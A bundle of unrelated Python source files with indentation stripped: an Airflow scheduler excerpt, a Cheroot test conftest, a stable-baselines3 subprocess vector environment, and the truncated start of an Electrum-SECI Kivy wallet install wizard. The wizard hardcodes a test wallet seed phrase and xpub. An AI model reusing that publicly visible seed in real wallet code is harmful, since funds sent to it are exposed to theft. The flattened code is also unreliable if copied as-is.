tis: List[TI] = session.query(TI).filter(filter_for_tis).options(selectinload('dag_model')).all()
for ti in tis:
try_number = ti_primary_key_to_try_number_map[ti.key.primary]
buffer_key = ti.key.with_try_number(try_number)
state, info = event_buffer.pop(buffer_key)
# TODO: should we fail RUNNING as well, as we do in Backfills?
if state == State.QUEUED:
ti.external_executor_id = info
self.log.info("Setting external_id for %s to %s", ti, info)
continue
if ti.try_number == buffer_key.try_number and ti.state == State.QUEUED:
Stats.incr('scheduler.tasks.killed_externally')
msg = (
"Executor reports task instance %s finished (%s) although the "
"task says its %s. (Info: %s) Was the task killed externally?"
)
self.log.error(msg, ti, state, ti.state, info)
request = TaskCallbackRequest(
full_filepath=ti.dag_model.fileloc,
simple_task_instance=SimpleTaskInstance(ti),
msg=msg % (ti, state, ti.state, info),
)
self.processor_agent.send_callback_to_execute(request)
return len(event_buffer)
def _execute(self) -> None:
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
self.log.info("Processing each file at most %s times", self.num_times_parse_dags)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds: int = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(
dag_directory=self.subdir,
max_runs=self.num_times_parse_dags,
processor_factory=type(self)._create_dag_file_processor,
processor_timeout=processor_timeout,
dag_ids=[],
pickle_dags=pickle_dags,
async_mode=async_mode,
)
try:
self.executor.job_id = self.id
self.executor.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
self._run_scheduler_loop()
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s", execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove() # type: ignore
except Exception: # pylint: disable=broad-except
self.log.exception("Exception when executing SchedulerJob._run_scheduler_loop")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
@staticmethod
def _create_dag_file_processor(
file_path: str,
callback_requests: List[CallbackRequest],
dag_ids: Optional[List[str]],
pickle_dags: bool,
) -> DagFileProcessorProcess:
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def _run_scheduler_loop(self) -> None:
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/apache-airflow/img/scheduler_loop.jpg
:rtype: None
"""
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
is_unit_test: bool = conf.getboolean('core', 'unit_test_mode')
timers = sched.scheduler()
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
timers.enter(delay, 1, repeat, args, kwargs)
timers.enter(delay, 1, repeat, arguments, kwargs)
# Check on start up, then every configured interval
self.adopt_or_reset_orphaned_tasks()
call_regular_interval(
conf.getfloat('scheduler', 'orphaned_tasks_check_interval', fallback=300.0),
self.adopt_or_reset_orphaned_tasks,
)
call_regular_interval(
conf.getfloat('scheduler', 'pool_metrics_interval', fallback=5.0),
self._emit_pool_metrics,
)
call_regular_interval(
conf.getfloat('scheduler', 'clean_tis_without_dagrun_interval', fallback=15.0),
self._clean_tis_without_dagrun,
)
for loop_count in itertools.count(start=1):
with Stats.timer() as timer:
if self.using_sqlite:
self.processor_agent.run_single_parsing_loop()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug("Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
with create_session() as session:
num_queued_tis = self._do_scheduling(session)
self.executor.heartbeat()
session.expunge_all()
num_finished_events = self._process_executor_events(session=session)
self.processor_agent.heartbeat()
# Heartbeat the scheduler periodically
self.heartbeat(only_if_necessary=True)
# Run any pending timed events
next_event = timers.run(blocking=False)
self.log.debug("Next timed event is in %f", next_event)
self.log.debug("Ran scheduling loop in %.2f seconds", timer.duration)
if not is_unit_test and not num_queued_tis and not num_finished_events:
# If the scheduler is doing things, don't sleep. This means when there is work to do, the
# scheduler will run "as quick as possible", but when it's stopped, it can sleep, dropping CPU
# usage when "idle"
time.sleep(min(self._processor_poll_interval, next_event))
if loop_count >= self.num_runs > 0:
self.log.info(
"Exiting scheduler loop as requested number of runs (%d - got to %d) has been reached",
self.num_runs,
loop_count,
)
break
if self.processor_agent.done:
self.log.info(
"Exiting scheduler loop as requested DAG parse count (%d) has been reached after %d"
" scheduler loops",
self.num_times_parse_dags,
loop_count,
)
break
@provide_session
def _clean_tis_without_dagrun(self, session):
with prohibit_commit(session) as guard:
try:
self._change_state_for_tis_without_dagrun(
old_states=[State.UP_FOR_RETRY], new_state=State.FAILED, session=session
)
self._change_state_for_tis_without_dagrun(
old_states=[State.QUEUED, State.SCHEDULED, State.UP_FOR_RESCHEDULE, State.SENSING],
new_state=State.NONE,
session=session,
)
guard.commit()
except OperationalError as e:
if is_lock_not_available_error(error=e):
self.log.debug("Lock held by another Scheduler")
session.rollback()
else:
raise
guard.commit()
def _do_scheduling(self, session) -> int:
"""
This function is where the main scheduling decisions take places. It:
- Creates any necessary DAG runs by examining the next_dagrun_create_after column of DagModel
Since creating Dag Runs is a relatively time consuming process, we select only 10 dags by default
(configurable via ``scheduler.max_dagruns_to_create_per_loop`` setting) - putting this higher will
mean one scheduler could spend a chunk of time creating dag runs, and not ever get around to
scheduling tasks.
- Finds the "next n oldest" running DAG Runs to examine for scheduling (n=20 by default, configurable
via ``scheduler.max_dagruns_per_loop_to_schedule`` config setting) and tries to progress state (TIs
to SCHEDULED, or DagRuns to SUCCESS/FAILURE etc)
By "next oldest", we mean hasn't been examined/scheduled in the most time.
The reason we don't select all dagruns at once because the rows are selected with row locks, meaning
that only one scheduler can "process them", even it it is waiting behind other dags. Increasing this
limit will allow more throughput for smaller DAGs but will likely slow down throughput for larger
(>500 tasks.) DAGs
- Then, via a Critical Section (locking the rows of the Pool model) we queue tasks, and then send them
to the executor.
See docs of _critical_section_execute_task_instances for more.
:return: Number of TIs enqueued in this iteration
:rtype: int
"""
# Put a check in place to make sure we don't commit unexpectedly
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
query = DagModel.dags_needing_dagruns(session)
self._create_dag_runs(query.all(), session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagruns
dag_runs = DagRun.next_dagruns_to_examine(session)
# Bulk fetch the currently active dag runs for the dags we are
# examining, rather than making one query per DagRun
# TODO: This query is probably horribly inefficient (though there is an
# index on (dag_id,state)). It is to deal with the case when a user
# clears more than max_active_runs older tasks -- we don't want the
# scheduler to suddenly go and start running tasks from all of the
# runs. (AIRFLOW-137/GH #1442)
#
# The longer term fix would be to have `clear` do this, and put DagRuns
# in to the queued state, then take DRs out of queued before creating
# any new ones
# Build up a set of execution_dates that are "active" for a given
# dag_id -- only tasks from those runs will be scheduled.
active_runs_by_dag_id = defaultdict(set)
query = (
session.query(
TI.dag_id,
TI.execution_date,
)
.filter(
TI.dag_id.in_(list({dag_run.dag_id for dag_run in dag_runs})),
TI.state.notin_(list(State.finished) + [State.REMOVED]),
)
.group_by(TI.dag_id, TI.execution_date)
)
for dag_id, execution_date in query:
active_runs_by_dag_id[dag_id].add(execution_date)
for dag_run in dag_runs:
self._schedule_dag_run(dag_run, active_runs_by_dag_id.get(dag_run.dag_id, set()), session)
guard.commit()
# Without this, the session has an invalid view of the DB
session.expunge_all()
# END: schedule TIs
try:
if self.executor.slots_available <= 0:
# We know we can't do anything here, so don't even try!
self.log.debug("Executor full, skipping critical section")
return 0
timer = Stats.timer('scheduler.critical_section_duration')
timer.start()
# Find anything TIs in state SCHEDULED, try to QUEUE it (send it to the executor)
num_queued_tis = self._critical_section_execute_task_instances(session=session)
# Make sure we only sent this metric if we obtained the lock, otherwise we'll skew the
# metric, way down
timer.stop(send=True)
except OperationalError as e:
timer.stop(send=False)
if is_lock_not_available_error(error=e):
self.log.debug("Critical section lock held by another Scheduler")
Stats.incr('scheduler.critical_section_busy')
session.rollback()
return 0
raise
guard.commit()
return num_queued_tis
def _create_dag_runs(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=dag_model.next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
self._update_dag_next_dagruns(dag_models, session)
# TODO[HA]: Should we do a session.flush() so we don't have to keep lots of state/object in
# memory for larger dags? or expunge_all()
def _update_dag_next_dagruns(self, dag_models: Iterable[DagModel], session: Session) -> None:
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
# Check max_active_runs, to see if we are _now_ at the limit for any of
# these dag? (we've just created a DagRun for them after all)
active_runs_of_dags = dict(
session.query(DagRun.dag_id, func.count('*'))
.filter(
DagRun.dag_id.in_([o.dag_id for o in dag_models]),
DagRun.state == State.RUNNING, # pylint: disable=comparison-with-callable
DagRun.external_trigger.is_(False),
)
.group_by(DagRun.dag_id)
.all()
)
for dag_model in dag_models:
dag = self.dagbag.get_dag(dag_model.dag_id, session=session)
active_runs_of_dag = active_runs_of_dags.get(dag.dag_id, 0)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_dag_run(
self,
dag_run: DagRun,
currently_active_runs: Set[datetime.datetime],
session: Session,
) -> int:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:param currently_active_runs: Number of currently active runs of this DAG
:return: Number of tasks scheduled
"""
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return 0
if (
dag_run.start_date
and dag.dagrun_timeout
and dag_run.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dag_run.state = State.FAILED
dag_run.end_date = timezone.utcnow()
self.log.info("Run %s of %s has timed-out", dag_run.run_id, dag_run.dag_id)
session.flush()
# Work out if we should allow creating a new DagRun now?
self._update_dag_next_dagruns([session.query(DagModel).get(dag_run.dag_id)], session)
callback_to_execute = DagCallbackRequest(
full_filepath=dag.fileloc,
dag_id=dag.dag_id,
execution_date=dag_run.execution_date,
is_failure_callback=True,
msg='timed_out',
)
# Send SLA & DAG Success/Failure Callbacks to be executed
self._send_dag_callbacks_to_processor(dag_run, callback_to_execute)
return 0
if dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error("Execution date is in future: %s", dag_run.execution_date)
return 0
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return 0
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
# TODO[HA]: Rename update_state -> schedule_dag_run, ?? something else?
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
self._send_dag_callbacks_to_processor(dag_run, callback_to_run)
# This will do one query per dag run. We "could" build up a complex
# query to update all the TIs across all the execution dates and dag
# IDs in a single query, but it turns out that can be _very very slow_
# see #11147/commit ee90807ac for more details
return dag_run.schedule_tis(schedulable_tis, session)
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_dag_callbacks_to_processor(
self, dag_run: DagRun, callback: Optional[DagCallbackRequest] = None
):
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
dag = dag_run.get_dag()
self._send_sla_callbacks_to_processor(dag)
if callback:
self.processor_agent.send_callback_to_execute(callback)
def _send_sla_callbacks_to_processor(self, dag: DAG):
"""Sends SLA Callbacks to DagFileProcessor if tasks have SLAs set and check_slas=True"""
if not settings.CHECK_SLAS:
return
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.debug("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
if not self.processor_agent:
raise ValueError("Processor agent is not started.")
self.processor_agent.send_sla_callback_request_to_execute(
full_filepath=dag.fileloc, dag_id=dag.dag_id
)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def adopt_or_reset_orphaned_tasks(self, session: Session = None):
"""
Reset any TaskInstance still in QUEUED or SCHEDULED states that were
enqueued by a SchedulerJob that is no longer running.
:return: the number of TIs reset
:rtype: int
"""
self.log.info("Resetting orphaned tasks for active dag runs")
timeout = conf.getint('scheduler', 'scheduler_health_check_threshold')
num_failed = (
session.query(SchedulerJob)
.filter(
SchedulerJob.state == State.RUNNING,
SchedulerJob.latest_heartbeat < (timezone.utcnow() - timedelta(seconds=timeout)),
)
.update({"state": State.FAILED})
)
if num_failed:
self.log.info("Marked %d SchedulerJob instances as failed", num_failed)
Stats.incr(self.__class__.__name__.lower() + '_end', num_failed)
resettable_states = [State.SCHEDULED, State.QUEUED, State.RUNNING]
query = (
session.query(TI)
.filter(TI.state.in_(resettable_states))
# outerjoin is because we didn't use to have queued_by_job
# set, so we need to pick up anything pre upgrade. This (and the
# "or queued_by_job_id IS NONE") can go as soon as scheduler HA is
# released.
.outerjoin(TI.queued_by_job)
.filter(or_(TI.queued_by_job_id.is_(None), SchedulerJob.state != State.RUNNING))
.join(TI.dag_run)
.filter(
DagRun.run_type != DagRunType.BACKFILL_JOB,
# pylint: disable=comparison-with-callable
DagRun.state == State.RUNNING,
)
.options(load_only(TI.dag_id, TI.task_id, TI.execution_date))
)
# Lock these rows, so that another scheduler can't try and adopt these too
tis_to_reset_or_adopt = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
to_reset = self.executor.try_adopt_task_instances(tis_to_reset_or_adopt)
reset_tis_message = []
for ti in to_reset:
reset_tis_message.append(repr(ti))
ti.state = State.NONE
ti.queued_by_job_id = None
for ti in set(tis_to_reset_or_adopt) - set(to_reset):
ti.queued_by_job_id = self.id
Stats.incr('scheduler.orphaned_tasks.cleared', len(to_reset))
Stats.incr('scheduler.orphaned_tasks.adopted', len(tis_to_reset_or_adopt) - len(to_reset))
if to_reset:
task_instance_str = '\n\t'.join(reset_tis_message)
self.log.info(
"Reset the following %s orphaned TaskInstances:\n\t%s", len(to_reset), task_instance_str
)
# Issue SQL/finish "Unit of Work", but let @provide_session commit (or if passed a session, let caller
# decide when to commit
session.flush()
return len(to_reset)
|
conftest.py
|
"""Pytest configuration module.
Contains fixtures, which are tightly bound to the Cheroot framework
itself, useless for end-users' app testing.
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import threading
import time
import pytest
from ..server import Gateway, HTTPServer
from ..testing import ( # noqa: F401
native_server, wsgi_server,
)
from ..testing import get_server_client
@pytest.fixture # noqa: F811
def wsgi_server_client(wsgi_server):
"""Create a test client out of given WSGI server."""
return get_server_client(wsgi_server)
@pytest.fixture # noqa: F811
def native_server_client(native_server):
"""Create a test client out of given HTTP server."""
return get_server_client(native_server)
@pytest.fixture
def http_server():
"""Provision a server creator as a fixture."""
def start_srv():
bind_addr = yield
httpserver = make_http_server(bind_addr)
yield httpserver
yield httpserver
srv_creator = iter(start_srv())
next(srv_creator)
yield srv_creator
try:
while True:
httpserver = next(srv_creator)
if httpserver is not None:
httpserver.stop()
except StopIteration:
pass
def make_http_server(bind_addr):
"""Create and start an HTTP server bound to bind_addr."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=Gateway,
)
threading.Thread(target=httpserver.safe_start).start()
while not httpserver.ready:
time.sleep(0.1)
return httpserver
|
subproc_vec_env.py
|
import multiprocessing as mp
from collections import OrderedDict
from typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import (
CloudpickleWrapper,
VecEnv,
VecEnvIndices,
VecEnvObs,
VecEnvStepReturn,
)
def _worker(remote: mp.connection.Connection,
parent_remote: mp.connection.Connection,
env_fn_wrapper: CloudpickleWrapper) -> None:
# Import here to avoid a circular import
from stable_baselines3.common.env_util import is_wrapped
import torch
torch.set_num_threads(1)
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
# if done:
# # save final observation where user can get it, then reset
# info["terminal_observation"] = observation
# observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset(data)
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
elif cmd == "is_wrapped":
remote.send(is_wrapped(env, data))
else:
raise NotImplementedError(
f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self,
env_fns: List[Callable[[], gym.Env]],
start_method: Optional[str] = None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in mp.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = mp.get_context(start_method)
self.remotes, self.work_remotes = zip(
*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes,
env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions: np.ndarray) -> None:
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self) -> VecEnvStepReturn:
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(
obs,
self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed: Optional[int] = None) -> List[Union[None, int]]:
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self, **kwargs) -> VecEnvObs:
for remote in self.remotes:
remote.send(("reset", kwargs))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
# New
def reset_arg(self, args_list, **kwargs) -> VecEnvObs:
obs = self.env_method_arg("reset", args_list, **kwargs)
return _flatten_obs(obs, self.observation_space)
def close(self) -> None:
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self,
attr_name: str,
indices: VecEnvIndices = None) -> List[Any]:
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self,
attr_name: str,
value: Any,
indices: VecEnvIndices = None) -> None:
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self,
method_name: str,
*method_args,
indices: VecEnvIndices = None,
**method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(
("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
# New
def env_method_arg(self,
method_name: str,
method_args_list,
indices: VecEnvIndices = None,
**method_kwargs) -> List[Any]:
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for method_args, remote in zip(method_args_list, target_remotes):
remote.send(
("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def env_is_wrapped(self,
wrapper_class: Type[gym.Wrapper],
indices: VecEnvIndices = None) -> List[bool]:
"""Check if worker environments are wrapped with a given wrapper"""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("is_wrapped", wrapper_class))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices: VecEnvIndices) -> List[Any]:
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs: Union[List[VecEnvObs], Tuple[VecEnvObs]],
space: gym.spaces.Space) -> VecEnvObs:
"""
Flatten observations, depending on the observation space.
:param obs: observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return: flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(
obs, (list,
tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(
space.spaces,
OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(
obs[0], dict
), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs]))
for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(
obs[0], tuple
), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_seci_gui.kivy.uix.dialogs import EventsDialog
from electrum_seci_gui.kivy.i18n import _
from electrum_seci.base_wizard import BaseWizard
from password_dialog import PasswordDialog
# global Variables
app = App.get_running_app()
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_seci_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
